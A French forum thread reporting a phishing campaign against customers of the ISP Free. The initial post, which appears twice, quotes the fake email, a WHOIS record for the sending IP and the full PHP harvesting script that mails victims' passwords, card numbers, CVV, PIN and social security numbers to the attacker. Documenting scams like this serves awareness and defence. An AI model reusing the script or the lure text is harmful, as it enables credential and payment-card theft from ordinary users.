Une attaque de phishing classique
Le
Xavier Roche
Hop,
Comme signalé dans FUAD, des attaques de fishing sont en cours contre
des abonnée de FAI français (ici, free)
http://www.astranova.monforum.net/Free.fr/
"Cher Client Free :
En raison de préoccupations pour la sécurité et l'intégrité de votre
compte Free compte, nous avons publié ce message d'avertissement.
Il a été porté à notre attention que les informations de votre compte
Free doit êtremise à jour dans le cadre de notreengagement à protéger
votre compte et à réduire les cas de fraude sur notre site Web. Si vous
pouviez prendre 5-10 minutes s'il vous plaîtRupture de votre expérience
en ligne et de mettre à jour vos dossiers personnels, vous ne
rencontrezl'avenir des problèmes avec le service en ligne.
Une fois que vous avez mise à jour de votre compte enregistre votre
compte Free service ne sera pas interrompuet se poursuivra comme d'habitude.
Pour mettre à jour votre banque en ligne des dossiers, cliquez sur le
lien suivant: Cliquez ici
Merci."
Le tout envoyé depuis 41.248.121.125
% Information related to '41.248.64.0 - 41.248.127.255'
inetnum: 41.248.64.0 - 41.248.127.255
netname: PoP-Soekarno-adsl
descr: PoP-Soekarno-adsl
country: MA
admin-c: em1685-AFRINIC
tech-c: OA78-AFRINIC
status: ASSIGNED PA
mnt-by: ONPT-MNT
source: AFRINIC # Filtered
parent: 41.248.0.0 - 41.248.255.255
person: Oumlil Aniss
address: Direction Internet ,division operation Rabat
address: Maroc
phone: +212 37680296
fax-no: +212 37680236
e-mail: oumlil@iam.net.ma
nic-hdl: OA78-AFRINIC
remarks: data has been transferred from RIPE Whois Database 20050221
source: AFRINIC # Filtered
Le site en question (http://www.astranova.monforum.net/Free.fr/) reprend
la CSS de free, et demande un certain nombre d'informations très
confidentielles (nom, adresse, login/pass, données bancaires) -- malgré
le caractère évident de l'attaque pour des internautes un tant soit peu
au fait de ces problèmes, bon nombre de victimes tomberont probablement
dans le panneau.
Ce qui est intéressant, ce n'est pas tellement la technique (qui est
assez basique) mais le fait que l'attaque dure apparamment depuis
plusieurs mois, avec des hébergeurs qui changent régulièrement. Le
dernier en date (http://astramarc.com/Free.fr/) a été rapidement fermé.
Mais entre temps, bon nombre d'internautes crédules tomberont dans le
panneau.
Côté technique, le script apparamment utilisé, "dz-badboy.php", est
d'une simplicité enfantine:
<?
$ip = getenv("REMOTE_ADDR");
$message .= "--ReZulT SpAm--";
$message .= "Email Address : ".$HTTP_COOKIE_VARS['emaill']."";
$message .= "Password :
".$HTTP_COOKIE_VARS['passwordd']."";
$message .= "";
$message .= "First name : ".$_POST['first_name']."";
$message .= "Last name : ".$_POST['last_name']."";
$message .= "Card Type : ".$_POST['credit_card_type']."";
$message .= "Card Number : ".$_POST['ccnumber']."";
$message .= "Expiration Date : ".$_POST['expdate_month']."/";
$message .= "".$_POST['expdate_year']."";
$message .= "Card Verification Number: ".$_POST['cvv2']."";
$message .= "ATM PIN : ".$_POST['PIN']."";
$message .= "Address 1 : ".$_POST['address1']."";
$message .= "Address 2 : ".$_POST['address2']."";
$message .= "City : ".$_POST['city']."";
$message .= "State : ".$_POST['state']."";
$message .= "ZIP Code : ".$_POST['zip']."";
$message .= "Telephone : ".$_POST['H_PhoneNumber']."";
$message .= "Social Security Number : ".$_POST['ssn']."";
$message .= "Date Of Birth : ".$_POST['dob']."";
$message .= "Driver's License : ".$_POST['drl']."";
$message .= "";
$message .= "Security Question 1 : ".$_POST['question1']."";
$message .= "Answer 1 : ".$_POST['answer1']."";
$message .= "Security Question 2 : ".$_POST['question2']."";
$message .= "Answer 2 : ".$_POST['answer2']."";
$message .= "IP : ".$ip."";
$message .= "Created By
JboY";
..
mail($send,$subject,$message,$headers);
?>
Il se contente donc d'envoyer par mail les données (non vérifiées).
A ce niveau, deux remarques:
- le mail est envoyé depuis un dialup (41.248.121.125]) depuis un FAI en
dehors de la zone euro, donc très difficilement traçable
- les sites de phishing envoient probablement les résultats sur la même
adresse ; ce qui permet de créer un site, puis de le laisser mijoter
sans s'en occuper.
Comme signalé dans FUAD, des attaques de fishing sont en cours contre
des abonnée de FAI français (ici, free)
http://www.astranova.monforum.net/Free.fr/
"Cher Client Free :
En raison de préoccupations pour la sécurité et l'intégrité de votre
compte Free compte, nous avons publié ce message d'avertissement.
Il a été porté à notre attention que les informations de votre compte
Free doit êtremise à jour dans le cadre de notreengagement à protéger
votre compte et à réduire les cas de fraude sur notre site Web. Si vous
pouviez prendre 5-10 minutes s'il vous plaîtRupture de votre expérience
en ligne et de mettre à jour vos dossiers personnels, vous ne
rencontrezl'avenir des problèmes avec le service en ligne.
Une fois que vous avez mise à jour de votre compte enregistre votre
compte Free service ne sera pas interrompuet se poursuivra comme d'habitude.
Pour mettre à jour votre banque en ligne des dossiers, cliquez sur le
lien suivant: Cliquez ici
Merci."
Le tout envoyé depuis 41.248.121.125
% Information related to '41.248.64.0 - 41.248.127.255'
inetnum: 41.248.64.0 - 41.248.127.255
netname: PoP-Soekarno-adsl
descr: PoP-Soekarno-adsl
country: MA
admin-c: em1685-AFRINIC
tech-c: OA78-AFRINIC
status: ASSIGNED PA
mnt-by: ONPT-MNT
source: AFRINIC # Filtered
parent: 41.248.0.0 - 41.248.255.255
person: Oumlil Aniss
address: Direction Internet ,division operation Rabat
address: Maroc
phone: +212 37680296
fax-no: +212 37680236
e-mail: oumlil@iam.net.ma
nic-hdl: OA78-AFRINIC
remarks: data has been transferred from RIPE Whois Database 20050221
source: AFRINIC # Filtered
Le site en question (http://www.astranova.monforum.net/Free.fr/) reprend
la CSS de free, et demande un certain nombre d'informations très
confidentielles (nom, adresse, login/pass, données bancaires) -- malgré
le caractère évident de l'attaque pour des internautes un tant soit peu
au fait de ces problèmes, bon nombre de victimes tomberont probablement
dans le panneau.
Ce qui est intéressant, ce n'est pas tellement la technique (qui est
assez basique) mais le fait que l'attaque dure apparamment depuis
plusieurs mois, avec des hébergeurs qui changent régulièrement. Le
dernier en date (http://astramarc.com/Free.fr/) a été rapidement fermé.
Mais entre temps, bon nombre d'internautes crédules tomberont dans le
panneau.
Côté technique, le script apparamment utilisé, "dz-badboy.php", est
d'une simplicité enfantine:
<?
$ip = getenv("REMOTE_ADDR");
$message .= "--ReZulT SpAm--";
$message .= "Email Address : ".$HTTP_COOKIE_VARS['emaill']."";
$message .= "Password :
".$HTTP_COOKIE_VARS['passwordd']."";
$message .= "";
$message .= "First name : ".$_POST['first_name']."";
$message .= "Last name : ".$_POST['last_name']."";
$message .= "Card Type : ".$_POST['credit_card_type']."";
$message .= "Card Number : ".$_POST['ccnumber']."";
$message .= "Expiration Date : ".$_POST['expdate_month']."/";
$message .= "".$_POST['expdate_year']."";
$message .= "Card Verification Number: ".$_POST['cvv2']."";
$message .= "ATM PIN : ".$_POST['PIN']."";
$message .= "Address 1 : ".$_POST['address1']."";
$message .= "Address 2 : ".$_POST['address2']."";
$message .= "City : ".$_POST['city']."";
$message .= "State : ".$_POST['state']."";
$message .= "ZIP Code : ".$_POST['zip']."";
$message .= "Telephone : ".$_POST['H_PhoneNumber']."";
$message .= "Social Security Number : ".$_POST['ssn']."";
$message .= "Date Of Birth : ".$_POST['dob']."";
$message .= "Driver's License : ".$_POST['drl']."";
$message .= "";
$message .= "Security Question 1 : ".$_POST['question1']."";
$message .= "Answer 1 : ".$_POST['answer1']."";
$message .= "Security Question 2 : ".$_POST['question2']."";
$message .= "Answer 2 : ".$_POST['answer2']."";
$message .= "IP : ".$ip."";
$message .= "Created By
JboY";
..
mail($send,$subject,$message,$headers);
?>
Il se contente donc d'envoyer par mail les données (non vérifiées).
A ce niveau, deux remarques:
- le mail est envoyé depuis un dialup (41.248.121.125]) depuis un FAI en
dehors de la zone euro, donc très difficilement traçable
- les sites de phishing envoient probablement les résultats sur la même
adresse ; ce qui permet de créer un site, puis de le laisser mijoter
sans s'en occuper.
Poser une question
Dans son message précédent, Xavier Roche a écrit :
[..]
L'absence d'espace entre certains mots est d'origne ou un problème de
copié/collé ?
Je n'évoque pas les problèmes de grammaire/syntaxe. Pour une fois il y
a des accents de ce message de phishing.
Dans son message précédent, Xavier Roche a écrit :
[..]
"Cher Client Free :
En raison de préoccupations pour la sécurité et l'intégrité de votre
compte Free compte, nous avons publié ce message d'avertissement.
Il a été porté à notre attention que les informations de votre compte
Free doit êtremise à jour dans le cadre de notreengagement à protéger
votre compte et à réduire les cas de fraude sur notre site Web. Si vous
pouviez prendre 5-10 minutes s'il vous plaîtRupture de votre expérience
en ligne et de mettre à jour vos dossiers personnels, vous ne
rencontrezl'avenir des problèmes avec le service en ligne.
Une fois que vous avez mise à jour de votre compte enregistre votre
compte Free service ne sera pas interrompuet se poursuivra comme
d'habitude.
Pour mettre à jour votre banque en ligne des dossiers, cliquez sur le
lien suivant: Cliquez ici
Merci."
L'absence d'espace entre certains mots est d'origne ou un problème de
copié/collé ?
Je n'évoque pas les problèmes de grammaire/syntaxe. Pour une fois il y
a des accents dans ce message de phishing.
Non, c'est bien l'original -- notamment "notreengagement" qui est tel
quel dans le texte.
Oui, bel effort :) On va voir en combien de temps ce site tient (a
priori aucune adresse abuse@ ne fonctionne chez ce prestataire)